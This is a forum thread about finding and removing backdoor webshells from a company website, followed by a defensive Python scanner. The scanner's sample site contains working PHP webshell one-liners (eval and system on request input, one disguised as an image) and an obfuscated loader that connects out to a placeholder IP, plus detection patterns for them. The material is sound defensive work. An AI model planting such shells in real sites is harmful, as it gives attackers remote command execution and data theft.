  #1 Junior Member (joined May 2013, 13 posts, member #36339):
    I recently took over as webmaster for a company. I have to update some files, so I downloaded all the site files from the server and virus-scanned them. I have 2 backdoor.shell viruses that are recognized by AVG.

    How do I go about removing them and securing the site? The site still shows "https://" as secure when live, but we have had some customers who have experienced identity theft, and we are trying to ensure that it is not from our site.

    Any and all advice is greatly appreciated!

  #2 Webzarus, Senior Member (joined May 2011, South Carolina Coast, 3,322 posts, member #27709, liked 770 times):
    That's actually a question you should be asking your hosting provider.

    Unless of course you own and manage your own servers (I suspect you don't), any decent hosting provider is going to be running active scanning of all files before they are allowed to be written to their servers.

    The more important question is how did they get there? Are you running any kind of advertising? Do you allow "customer uploads"? Do you have file and folder permissions set correctly on the server?

    Did "all" the previous web company's passwords get removed or changed? Do you have any files that don't seem to go along with the actual site?

    There are literally hundreds of ways this can happen, but the above list should be looked at and addressed.

    Just because a file exists on a site doesn't mean the site itself is distributing it; more often, it's just a storage place "because of lax security", and other sites call the files...

    Then again, there could be some includes in your code... sending it out to all visitors...

    If there's any concern at all that your site is distributing malware or viruses... the site should be shut down, all files examined and all file and folder permissions checked, before bringing it back online.

  #3 Junior Member (joined May 2013, 13 posts, member #36339):
    Thanks for all your help, Webzarus; it is greatly appreciated. Not sure how the files got there; I'm corresponding with tech support from the hosting company right now.

    No customer uploading whatsoever, file and folder permissions are set accordingly.

    So I'm guessing this isn't as easy as locating the files and just pressing delete?

  #4 TheGAME1264, Unpaid WDF Intern (joined Dec 2002, Not from USA, 14,483 posts, member #425, liked 2783 times):
    No, although it's not necessarily a hosting issue either. If the site is running one of the garbage so-called "CMSes", such as W*rdPr*ss, then it may very well have been exploited. I've seen this happen multiple times over the past few years, more so than with the hosting provider themselves (although they're just as likely to be culpable).

    The best thing you can do in this case is to get the exact names of the viruses, Google them and see what others may be saying about them. That'll at least narrow down to some extent the steps you have to take.

    Another option, although this is hit and miss, is to sign up for Google Webmaster Tools and see if they have any malware/virus reports for your site. If there's anything causing harm, they quite often know about it.

    Some of the things you'll need to do in general:

    1) Change any and all passwords. Ideally, you want to change them to some combination of mixed-case letters, numbers, and symbols.

    2) If there are any common usernames for admins, such as "admin" or "administrator", kill those logins or replace them with something more obscure... like, say, your name.

    3) If you're running any CMSes, make sure they and any plugins are up to date, and look toward getting rid of them... especially if the virus originated from the CMS you're using.

    4) Like WZ said, have a look at your permissions. Don't just take your host's word for it, either... actually go through all the folders/subfolders and make sure there is nothing beyond read permissions for anything that doesn't need it.

  #5 Banned (joined Apr 2014, 13 posts, member #38859):
    I'm not sure whether AVG has something that can scan servers, but if it does, awesome. See if it can delete them. If it is a CMS, download a plugin like Wordfence.

    Otherwise, I'd just go through your code and try to identify anything that looks suspicious. Backdoors try to "phone home", so look for something that is trying to contact an outside IP/domain or FTP data to another server. You may also want to look at other computers on your network to make sure the attack didn't originate from them either. Even secure your WiFi, because an actual intrusion, and not just some bot, may have infected your whole network.

    Get your company to invest in a good firewall like a Cisco ASA. They're decently priced, and operating one is something you can put on a resume.

    Like Game said, go through and restrict permissions too.
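The manual review described in posts #2, #4 and #5 (look for files that don't belong, check folder permissions, and grep the code for anything that executes input or phones home) can be turned into a repeatable triage pass over the downloaded copy of the site. The script below is an added example for this thread, not code from any poster or from AVG/Wordfence. It assumes a PHP site whose files were pulled to a local directory, as the original poster did; the sample site tree it builds, the planted backdoors in it, the TEST-NET address 203.0.113.5 and the scoring weights are all constructed for illustration, and a hit is a reason to read the file, not a verdict.

```python
"""Hunt for PHP webshell indicators in a downloaded copy of a site.

Added example for this thread; not code from any poster. Assumes the site's
files have been pulled to a local directory and that the site is PHP. The
patterns below are a triage heuristic, not a definition of "malicious".
"""
import os
import re
import stat
import tempfile
from dataclasses import dataclass, field

PHP_EXT = {".php", ".phtml", ".php5", ".php7", ".inc"}

# Code/command execution sinks: a webshell has to end in one of these.
EXEC_SINK = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\("
    r"|\bpreg_replace\s*\(\s*['\"]/[^'\"]*/[imsxu]*e['\"]"
)
# Decoders that hide the payload handed to a sink.
OBFUSCATION = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev|hex2bin)\s*\(")
# Attacker-controlled input arriving with the HTTP request.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
# Outbound connections used to phone home or push data off the box.
CALLBACK = re.compile(r"\b(fsockopen|curl_exec|ftp_connect|ftp_put|stream_socket_client)\s*\(")
# A long run of base64 alphabet: an encoded payload waiting to be decoded.
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


@dataclass
class Finding:
    rel: str                     # path relative to the scanned root, "/"-separated
    score: int
    reasons: list = field(default_factory=list)


def scan_php_source(src: str) -> tuple[int, list[str]]:
    """Score one file's source text; higher means more webshell-like."""
    score, reasons = 0, []
    sinks = sorted({m.group(0).split("(")[0].strip() for m in EXEC_SINK.finditer(src)})
    if sinks:
        score += 1
        reasons.append("execution sink: " + ", ".join(sinks))
        if REQUEST_INPUT.search(src):          # request data next to a sink
            score += 3
            reasons.append("request input ($_GET/$_POST/...) alongside a sink")
        if OBFUSCATION.search(src):            # decoded blob next to a sink
            score += 3
            reasons.append("decoder (base64_decode/gzinflate/...) alongside a sink")
    if LONG_BASE64.search(src):
        score += 2
        reasons.append("long base64 blob")
    if CALLBACK.search(src):
        score += 1
        reasons.append("outbound connection call (possible phone-home/exfil)")
    return score, reasons


def scan_tree(root: str, threshold: int = 3) -> list[Finding]:
    """Walk root and return files scoring at or above threshold, worst first."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue                        # skip symlinks, sockets, etc.
            with open(path, "rb") as fh:
                data = fh.read(2_000_000)       # more than any web source file
            is_php = os.path.splitext(name)[1].lower() in PHP_EXT
            if not is_php and b"<?php" not in data:
                continue                        # plain asset with no PHP inside
            score, reasons = scan_php_source(data.decode("utf-8", errors="replace"))
            if not is_php:                      # PHP hiding behind .jpg/.txt etc.
                score += 2
                reasons.append("PHP code inside a non-PHP file")
            if is_php and name.startswith("."):
                score += 1
                reasons.append("hidden PHP file")
            if st.st_mode & stat.S_IWOTH:       # the permission check from posts #2 and #4
                score += 1
                reasons.append("world-writable (mode %o)" % stat.S_IMODE(st.st_mode))
            if score >= threshold:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append(Finding(rel, score, reasons))
    return sorted(findings, key=lambda f: f.score, reverse=True)


def build_sample_site() -> str:
    """Write a constructed sample site tree to a temp dir and return its path.

    Everything here is made up for the example: two ordinary files, a contact
    form that reads $_POST but never executes anything, and three planted
    backdoors of the kinds AV products label "backdoor.shell".
    """
    root = tempfile.mkdtemp(prefix="site-")
    blob = ("QUJD" * 40).encode()               # stands in for an encoded payload (constructed)
    files = {
        "index.php": b"<?php require 'includes/db.php'; echo '<h1>Welcome</h1>'; ?>\n",
        "includes/db.php": b"<?php $db = new PDO('mysql:host=localhost;dbname=shop', 'u', 'p'); ?>\n",
        "contact.php": b"<?php mail('sales@example.com', 'Contact form', $_POST['msg']); ?>\n",
        "images/.cache.php": b"<?php @eval($_POST['c']); ?>\n",          # one-line shell, hidden file
        "includes/config.old.php": (b"<?php\n$p = base64_decode('" + blob + b"');\n"
                                    b"eval(gzinflate($p));\n$s = fsockopen('203.0.113.5', 8080);\n"),
        "images/banner.jpg": b"\xff\xd8\xff<?php system($_GET['cmd']); ?>",   # PHP behind an image name
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    os.chmod(os.path.join(root, "images", ".cache.php"), 0o666)   # lax permission, to exercise the check
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for f in scan_tree(site):
        print(f"{f.score:2d}  {f.rel}")
        for r in f.reasons:
            print("      -", r)
```

Run against the real download, the hits are the files to open by hand and to compare against a clean copy of the CMS or the previous developer's handover; the contact form in the sample shows why request input on its own is not scored, and the .jpg shows why the scan keys on content rather than extension. Deleting a flagged file removes only that foothold, which is the point post #4 makes: the passwords, admin accounts and permissions that let it be written still have to be dealt with.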


Powered by vBulletin® Version 4.2.3
Copyright © 2019 vBulletin Solutions, Inc. All rights reserved.